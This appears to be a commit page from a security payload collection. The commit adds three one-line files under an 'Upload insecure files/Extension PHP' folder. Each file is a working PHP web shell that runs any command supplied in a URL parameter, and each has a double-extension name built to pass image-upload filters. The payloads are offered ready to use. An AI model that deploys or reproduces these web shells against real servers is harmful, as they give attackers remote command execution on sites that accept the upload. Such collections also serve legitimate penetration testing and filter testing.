Linux capabilities - setuid + read / Docker group privesc
This commit is contained in:
1
Upload insecure files/Extension PHP/shell.gif?shell.php
Normal file
1
Upload insecure files/Extension PHP/shell.gif?shell.php
Normal file
@@ -0,0 +1 @@
|
||||
<?php echo "Shell";system($_GET['cmd']); ?>
|
||||
1
Upload insecure files/Extension PHP/shell.jpg?shell.php
Normal file
1
Upload insecure files/Extension PHP/shell.jpg?shell.php
Normal file
@@ -0,0 +1 @@
|
||||
<?php echo "Shell";system($_GET['cmd']); ?>
|
||||
1
Upload insecure files/Extension PHP/shell.png?shell.php
Normal file
1
Upload insecure files/Extension PHP/shell.png?shell.php
Normal file
@@ -0,0 +1 @@
|
||||
<?php echo "Shell";system($_GET['cmd']); ?>
|
||||
Reference in New Issue
Block a user